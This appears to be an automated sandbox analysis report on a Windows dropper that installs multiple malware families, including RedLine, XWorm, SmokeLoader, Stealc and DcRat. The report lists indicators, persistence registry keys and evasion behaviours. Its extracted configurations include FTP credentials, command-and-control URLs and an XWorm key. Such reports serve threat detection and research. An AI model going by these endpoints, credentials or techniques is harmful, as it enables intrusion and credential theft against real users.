Analysis
-
max time kernel
177s -
max time network
391s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-01-2024 00:36
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231222-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
Protocol: ftp- Host:
braun-web.de - Port:
21 - Username:
[email protected] - Password:
W-',MR8n2X
Extracted
Protocol: ftp- Host:
braun-web.de - Port:
21 - Username:
florian - Password:
W-',MR8n2X
Extracted
Protocol: ftp- Host:
braun-web.de - Port:
21 - Username:
admin - Password:
W-',MR8n2X
Extracted
Protocol: ftp- Host:
braun-web.de - Port:
21 - Username:
braun-web - Password:
W-',MR8n2X
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
smokeloader
pub2
Extracted
xworm
5.0
canadian-perspectives.gl.at.ply.gg:33203
TLsk4Xp0P8GNpwQw
-
Install_directory
%AppData%
-
install_file
msedge.exe
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Signatures
-
DcRat 8 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 3200 schtasks.exe 3192 schtasks.exe 1376 schtasks.exe 3132 schtasks.exe 2200 schtasks.exe 2580 schtasks.exe 2736 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral4/files/0x0006000000025c8d-690.dat family_xworm behavioral4/files/0x0006000000025c8d-707.dat family_xworm behavioral4/files/0x0006000000025c8d-706.dat family_xworm -
Detect ZGRat V1 21 IoCs
resource yara_rule behavioral4/memory/2772-247-0x00000000055F0000-0x0000000005688000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-250-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-253-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-263-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-268-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-270-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-272-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-288-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-303-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-311-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-320-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-315-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-326-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-329-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-309-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-306-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-284-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-281-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-276-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-266-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 behavioral4/memory/2772-258-0x00000000055F0000-0x0000000005682000-memory.dmp family_zgrat_v1 -
Quasar payload 1 IoCs
resource yara_rule behavioral4/files/0x000e000000025028-9737.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral4/memory/1820-330-0x0000000000D10000-0x0000000000D38000-memory.dmp family_redline -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1144 created 3020 1144 asdfg.exe 43 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syspolrvcs.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2328 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk Archevod_XWorm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk Archevod_XWorm.exe -
Executes dropped EXE 64 IoCs
pid Process 3884 latestroc.exe 4960 InstallSetup8.exe 3688 powershell.exe 2332 Conhost.exe 440 BroomSetup.exe 4288 rty25.exe 32 nsb7D6F.tmp 1836 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 936 setup.exe 492 injector.exe 4340 powershell.exe 2772 Awwnbpxqsf.exe 4628 WerFault.exe 4512 31839b57a4f11171d6abc8bbc4451ee4.exe 4224 hv.exe 2668 Conhost.exe 3932 Archevod_XWorm.exe 1832 timeSync.exe 2152 BLduscfibj.exe 1144 asdfg.exe 1544 BLduscfibj.exe 1384 csrss.exe 3692 3EE8.exe 492 injector.exe 4616 6444.exe 3384 powershell.exe 712 7127.exe 2372 windefender.exe 3600 windefender.exe 2584 Awwnbpxqsf.exe 3012 Awwnbpxqsf.exe 4692 Awwnbpxqsf.exe 3996 Awwnbpxqsf.exe 3396 Awwnbpxqsf.exe 4464 InstallUtil.exe 1392 Awwnbpxqsf.exe 4600 Awwnbpxqsf.exe 2960 Awwnbpxqsf.exe 896 Awwnbpxqsf.exe 852 msedge.exe 1644 StringIds.exe 1772 StringIds.exe 1664 E36A.exe 4988 E80E.exe 4628 F1F.exe 3180 stub.exe 2200 schtasks.exe 3560 pwivssxb.exe 3548 pwivssxb.exe 3468 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 2288 Client-built.exe 780 Client.exe 3980 9.exe 244 twztl.exe 1568 c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe 4364 c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe 2872 syspolrvcs.exe 4564 1673615808.exe 2976 SupportsDynamicPartitions.exe 2820 msedge.exe 2068 SupportsDynamicPartitions.exe 4684 785413909.exe 3396 svcrun.exe -
Loads dropped DLL 64 IoCs
pid Process 4960 InstallSetup8.exe 4960 InstallSetup8.exe 32 nsb7D6F.tmp 32 nsb7D6F.tmp 4960 InstallSetup8.exe 1832 timeSync.exe 1832 timeSync.exe 4224 hv.exe 1784 RegAsm.exe 1784 RegAsm.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 3180 stub.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe 1628 Voiceaibeta-5.13.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000100000002ab9c-10205.dat upx -
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" syspolrvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syspolrvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspolrvcs.exe" twztl.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tests_for_preparation_for_the_academy = "C:\\Users\\Admin\\AppData\\Local\\Tests_for_preparation_for_the_academy\\Tests_for_preparation_for_the_academy.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\msedge = "C:\\Users\\Admin\\AppData\\Roaming\\msedge.exe" Archevod_XWorm.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\Pmhgyh = "C:\\Users\\Admin\\AppData\\Roaming\\Pmhgyh.exe" Awwnbpxqsf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 14 raw.githubusercontent.com 37 raw.githubusercontent.com 74 raw.githubusercontent.com 5 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 55 ipinfo.io 150 api.ipify.org 157 api.ipify.org -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Awwnbpxqsf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe 4988 E80E.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 4628 set thread context of 1820 4628 WerFault.exe 134 PID 2668 set thread context of 1144 2668 Conhost.exe 161 PID 2152 set thread context of 1544 2152 BLduscfibj.exe 165 PID 4224 set thread context of 3812 4224 hv.exe 196 PID 4616 set thread context of 1448 4616 6444.exe 257 PID 3384 set thread context of 1784 3384 powershell.exe 260 PID 712 set thread context of 3148 712 7127.exe 263 PID 1644 set thread context of 1772 1644 StringIds.exe 285 PID 1772 set thread context of 4944 1772 StringIds.exe 292 PID 4944 set thread context of 4464 4944 InstallUtil.exe 294 PID 3560 set thread context of 3548 3560 pwivssxb.exe 310 PID 1568 set thread context of 4364 1568 c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe 326 PID 2976 set thread context of 2068 2976 SupportsDynamicPartitions.exe 338 PID 2068 set thread context of 2152 2068 SupportsDynamicPartitions.exe 340 PID 2152 set thread context of 2584 2152 RegAsm.exe 341 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-002D6F84.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-013CCD33.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-16AF9B6E.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7194EF5E.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7BB97BF6.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-E93AC6A6.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-104C7847.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\PfPre_6c4d5399.mkd BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-1323A357.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-EC979AE0.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\FSQUIRT.EXE-BBD9646E.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\ONEDRIVESETUP.EXE-8CE5A462.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-A8DE6D5B.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\DXKYCN.EXE-5FD1FC5D.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-AED2006F.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-0B3A9016.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\WFSERVICESREG.EXE-6AD9F515.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\AgRobust.db BroomSetup.exe File opened for modification C:\Windows\Prefetch\TASKHOSTW.EXE-3E0B74C8.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-01E21A55.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-641DCE1C.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-FCAF5656.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-B8EF7F74.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-4BA0E729.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\ReadyBoot\ReadyBoot.etl BroomSetup.exe File opened for modification C:\Windows\Prefetch\REG.EXE-E7E8BD26.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-0A03C9B5.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-47DEBDFE.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-AE5EC6E9.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-7CFEDEA3.pf BroomSetup.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-49F32A6F.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-FFAD4E3B.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\ResPriStaticDb.ebd BroomSetup.exe File opened for modification C:\Windows\Prefetch\VERCLSID.EXE-7C52E31C.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\AgGlGlobalHistory.db BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-6F2A95AF.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-FC4F7215.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\WLRMDR.EXE-C2B47318.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-39F0F210.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\AgAppLaunch.db BroomSetup.exe File opened for modification C:\Windows\Prefetch\AgGlFgAppHistory.db BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-4EFE6110.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-039D5D2E.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-25616620.pf BroomSetup.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Prefetch\DISMHOST.EXE-A466E6AD.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\LINQWEBCONFIG.EXE-4E2703D2.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\TAKEOWN.EXE-A80759AD.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\DISM.EXE-DE199F71.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-B540D505.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\SEARCHFILTERHOST.EXE-77482212.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\VSSVC.EXE-B8AFC319.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-FC981FFE.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\PfSvPerfStats.bin BroomSetup.exe File opened for modification C:\Windows\Prefetch\PSEXESVC.EXE-7F956DAF.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-4DC9A20E.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-B2C296EF.pf BroomSetup.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-DB926CB0.pf BroomSetup.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-5B70F332.pf BroomSetup.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4360 sc.exe 200 sc.exe 6140 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral4/files/0x000700000000f65f-8733.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 3508 2332 WerFault.exe 81 692 2332 WerFault.exe 81 1552 2332 WerFault.exe 81 4848 2332 WerFault.exe 81 3388 2332 WerFault.exe 81 3736 2332 WerFault.exe 81 3912 2332 WerFault.exe 81 2984 2332 WerFault.exe 81 1120 2332 WerFault.exe 81 2668 2332 WerFault.exe 81 3740 2332 WerFault.exe 81 2908 2332 WerFault.exe 81 4224 2332 WerFault.exe 81 2564 2332 WerFault.exe 81 412 2332 WerFault.exe 81 4540 2332 WerFault.exe 81 2308 492 WerFault.exe 125 3560 4512 WerFault.exe 136 1964 4512 WerFault.exe 136 828 4512 WerFault.exe 136 3364 4512 WerFault.exe 136 1416 4512 WerFault.exe 136 4180 4512 WerFault.exe 136 5036 4512 WerFault.exe 136 3548 4512 WerFault.exe 136 1016 4512 WerFault.exe 136 2864 2332 WerFault.exe 81 2928 2332 WerFault.exe 81 4860 1836 WerFault.exe 1960 2332 WerFault.exe 81 2572 1144 WerFault.exe 161 1432 1144 WerFault.exe 161 1448 32 WerFault.exe 175 720 1832 WerFault.exe 162 4696 1384 WerFault.exe 208 4624 1384 WerFault.exe 208 848 1384 WerFault.exe 208 2960 1384 WerFault.exe 208 1440 1384 WerFault.exe 208 2096 1384 WerFault.exe 208 932 1384 WerFault.exe 208 3700 1384 WerFault.exe 208 2748 1384 WerFault.exe 208 900 1384 WerFault.exe 208 4828 1384 WerFault.exe 208 4752 1384 WerFault.exe 208 2876 1384 WerFault.exe 208 2932 1384 WerFault.exe 208 2312 1664 WerFault.exe 286 2580 1664 WerFault.exe 286 32 3980 WerFault.exe 317 2284 1384 WerFault.exe 208 364 1384 WerFault.exe 208 2984 4364 WerFault.exe 326 4752 4564 WerFault.exe 334 4708 1384 WerFault.exe 208 392 1384 WerFault.exe 208 3484 2004 WerFault.exe 366 4624 2004 WerFault.exe 366 1084 2652 WerFault.exe 379 5568 4636 WerFault.exe 382 5788 3996 WerFault.exe 350 1632 5900 WerFault.exe 408 5448 5368 WerFault.exe 429 -
NSIS installer 2 IoCs
resource yara_rule behavioral4/files/0x000100000002ab92-9968.dat nsis_installer_1 behavioral4/files/0x000100000002ab92-9968.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3EE8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3EE8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI schtasks.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3EE8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nsb7D6F.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nsb7D6F.tmp Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 timeSync.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString timeSync.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2736 schtasks.exe 3200 schtasks.exe 1376 schtasks.exe 3132 schtasks.exe 3192 schtasks.exe 2200 schtasks.exe 2580 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4540 timeout.exe 2572 timeout.exe 3804 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2204 tasklist.exe -
Kills process with taskkill 1 IoCs
pid Process 4976 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-961 = "Paraguay 